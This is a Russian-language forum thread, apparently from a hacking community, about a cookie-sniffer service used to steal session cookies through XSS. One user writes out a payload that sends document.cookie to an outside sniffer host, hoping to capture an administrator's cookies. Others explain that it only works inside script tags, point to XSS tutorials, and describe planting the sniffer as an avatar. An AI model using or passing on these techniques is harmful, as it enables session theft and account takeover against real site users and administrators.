Snork, значит на сайте на котором ставишь код, по ней заходит неавторизованный пользователь..либо вообще не так ставишь!
Заходят авторизированные пользователи я дажимаю в тексте добавить ссылку и пишу http://s.netsec.ru/pop.gif?"+document.cookie; нажимает админ и ниче не идет просто общая информация а кук нет....
Блин я разобратсо не могу просто напишите тут что печатать чтобы када в ссылку всталяешь чтоб куки приходили и это избавит всех от флуда и меня от бана)))))))))
читайте статьи. уязвимости вам никто искать не будет. в первом линке была ссылка на карту - там более чем достаточно материала собрано.
Объясняю на пальцах -куки возможно передать тока если ссылка на сниффер стоит в тегах <script></script> - по другому никак.... А вот как это сделать -уже другой вопрос, потмоу что практически на 98% сайтах и сервисах фильтруются теги <script> <style> <img> и другие .. А тем более на майлру
Небольшое обновление. Теперь можно загрузить свою картинку, заместо гифа 1х1. http://s.netsec.ru/log.php?opt
Ребята кто не знает как заставить снифер ловить cookies читайте http://forum.antichat.ru/thread46016-XSS.html http://forum.antichat.ru/thread21437-XSS.html http://forum.antichat.ru/thread51783-XSS.html http://forum.antichat.ru/thread35802-XSS.html
Поставил снифф как аву на одном сайте... Отчёты идут, но куков нет. Сделал - грузить аватару с удалённого сервера. Есть советы?
Не работала, каждый раз в гет запросы дописывался еще гет запрос: page=30&page=60&page=90 И еще не было выделена курентная страница болдом
=( я вот думаю не очень это корректно.. ведь любой может удалить все логи за 30 минут. лучше добавить проверку какую-нибудь (по чьей картинке прошли тот и может удалять)
